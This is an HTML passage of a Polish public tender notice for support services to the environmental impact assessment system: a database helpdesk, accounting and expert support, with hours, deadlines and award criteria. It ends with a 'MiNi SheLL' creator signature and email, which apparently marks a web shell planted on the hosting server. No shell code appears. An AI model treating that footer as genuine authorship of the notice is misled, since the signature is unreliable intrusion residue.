f) współpracy przy monitorowaniu realizacji umów, w tym: bieżących kontaktach roboczych z wykonawcami, monitorowaniu terminowej realizacji umów;
g) obsłudze technicznej procesu wydawniczego, w tym: koordynacji i monitoringu zleceń poligraficznych bezpośredniej współpracy z drukarniami i autorami opracowań, weryfikacji składu publikacji i nanoszeniu korekty wydawniczej zgodnie z normą PN-72/P-55036, współpracy z bibliotekami w zakresie przesyłania obowiązkowych egzemplarzy bibliotecznych zgodnie z ustawą z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (Dz. U. Nr 152, poz. 722, z późn. zm.) i rozporządzeniem Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad i trybu ich przekazywania (Dz. U. Nr 29, poz. 161, z późn. zm.);
h) dystrybucji i prowadzeniu rejestru publikacji;
i) prowadzeniu rejestru rocznych sprawozdań przedkładanych zgodnie z art. 129 ust. 1 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2013 r. poz.1235, z późn. zm.) oraz monitowaniu jednostek, które nie wywiązały się z obowiązku. Zamawiający informuje, że wykonanie Zadania będzie wymagało mobilności i dyspozycyjności w zakresie wykonywania zadań (czynności będące przedmiotem umowy w sprawie zamówienia publicznego, Wykonawca wykonywać będzie w siedzibie Zamawiającego w godzinach pracy obowiązujących u Zamawiającego, a w razie potrzeby także poza tymi godzinami lub/i poza siedzibą Zamawiającego.
Dla usług objętych Zadaniem I przewiduje się maksymalnie 6032 roboczogodzin w trakcie trwania umowy w sprawie zamówienia publicznego (w 2015 r.  2016 godz., w 2016 r. 2016 godz., w 2017 r.  2000 godz.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Test wiedzy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie usług typu helpdesk dla użytkowników systemu informatycznego wspomagającego proces ocen oddziaływania na środowisko (Bazy danych ooś),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000 realizowanego w ramach programu priorytetowego 5.1 Wsparcie Ministra Środowiska w zakresie realizacji polityki ochrony środowiska Część 1) Ekspertyzy, opracowania, realizacja zobowiązań międzynarodowych: w podziale na cztery części (Zadania):
1). Część (Zadanie) II świadczenie usług typu helpdesk dla użytkowników systemu informatycznego wspomagającego proces ocen oddziaływania na środowisko (Bazy danych ooś), polegających na:
a) obsłudze bazy danych użytkowników (w tym w szczególności: nadawanie uprawnień do modułów Bazy danych ooś, usuwanie błędnych rekordów, zarządzanie kontami użytkowników);
b) pomocy w rozwiązywaniu bieżących problemów użytkowników z funkcjonowaniem Bazy danych ooś;
c) analizie zgłaszanych problemów i uwag pod kątem poszukiwania nowych rozwiązań i funkcjonalności oraz zgłaszaniu ich zespołowi ds. zmian w Bazie danych ooś;
d) sporządzaniu raportów, zestawień (w tym dotyczących ilości i profilu użytkowników i sposobu użytkowania Bazy danych ooś, ilości postępowań); 
e) wsparciu merytorycznym przy obsłudze Bazy danych ooś (w tym w kontaktach z użytkownikami, wykonawcą Bazy danych ooś i z administratorem centralnym w zakresie funkcjonalności, dostępnych w Bazie danych ooś);
f) udziale w kontroli jakości szkoleń w zakresie obsługi Bazy danych ooś.
Dla usług objętych Zadaniem II przewiduje się maksymalnie 6032 roboczogodzin w trakcie trwania umowy w sprawie zamówienia publicznego (w 2015 r. 2016 godz., w 2016 r.  2016 godz., w 2017 r.  2000 godz.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Test wiedzy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Obsługa finansowo-księgowa wydatków budżetowych Zamawiającego, jako dysponenta III stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000 realizowanego w ramach programu priorytetowego 5.1 Wsparcie Ministra Środowiska w zakresie realizacji polityki ochrony środowiska Część 1) Ekspertyzy, opracowania, realizacja zobowiązań międzynarodowych: w podziale na cztery części (Zadania):
1) Część (Zadanie) III  Obsługa finansowo-księgowa wydatków budżetowych Zamawiającego, jako dysponenta III stopnia, w ramach projektu, w tym regulowanie zobowiązań bezgotówkowych celem prawidłowego realizowania wydatków budżetowych, zgodnie z obowiązującym planem rzeczowo-finansowym Zamawiającego, obejmująca:
a) przyjmowanie, sprawdzanie i opisywanie dowodów księgowych pod względem formalnorachunkowym oraz ich dekretowanie;
b) kontrolę poprawności danych rachunkowych i opisów dowodów pod względem merytorycznym oraz zgodności z zawartymi umowami;
c) wystawianie not księgowych i not korygujących;
d) wprowadzanie dokumentów księgowych do modułu Finansowo-Księgowego;
e) rozliczanie delegacji krajowych;
f) współpracę z komórkami organizacyjnymi Zamawiającego w zakresie związanym z realizacją umowy w sprawie zamówienia publicznego;
g) rozliczanie umów cywilnoprawnych;
h) przygotowywanie dokumentacji rozliczeniowej dotyczącej okresowych i końcowych dofinansowań oraz sprawozdań z realizacji projektu;
i) bieżący monitoring wykorzystania środków w ramach projektu.
Dla usług objętych Zadaniem III przewiduje się maksymalnie 5784 roboczogodzin w trakcie trwania umowy w sprawie zamówienia publicznego (w 2015 r. 1768 godz., w 2016 r. 2016 godz., w 2017 r. 2000 godz.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Test wiedzy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> świadczenie usług wsparcia merytorycznego 
w zakresie ocen oddziaływania na środowisko ze szczególnym uwzględnieniem aspektów przyrodniczych w postępowaniach ooś.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000 realizowanego w ramach programu priorytetowego 5.1 Wsparcie Ministra Środowiska w zakresie realizacji polityki ochrony środowiska Część 1) Ekspertyzy, opracowania, realizacja zobowiązań międzynarodowych: w podziale na cztery części (Zadania):
1) Część (Zadanie) IV - świadczenie usług wsparcia merytorycznego w zakresie ocen oddziaływania na środowisko ze szczególnym uwzględnieniem aspektów przyrodniczych w postępowaniach ooś, polegających na:
a) wsparciu przy przygotowaniu założeń merytorycznych i weryfikacji treści publikacji mających za zadanie poprawę jakości dokumentacji z zakresu ocen oddziaływania na środowisko;
b) wsparciu przy weryfikacji aktów prawa miejscowego pod kątem konieczności przeprowadzenia strategicznej oceny oddziaływania na środowisko. 
Dla usług objętych Zadaniem IV przewiduje się maksymalnie 288 roboczogodzin w trakcie trwania umowy w sprawie zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Test wiedzy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com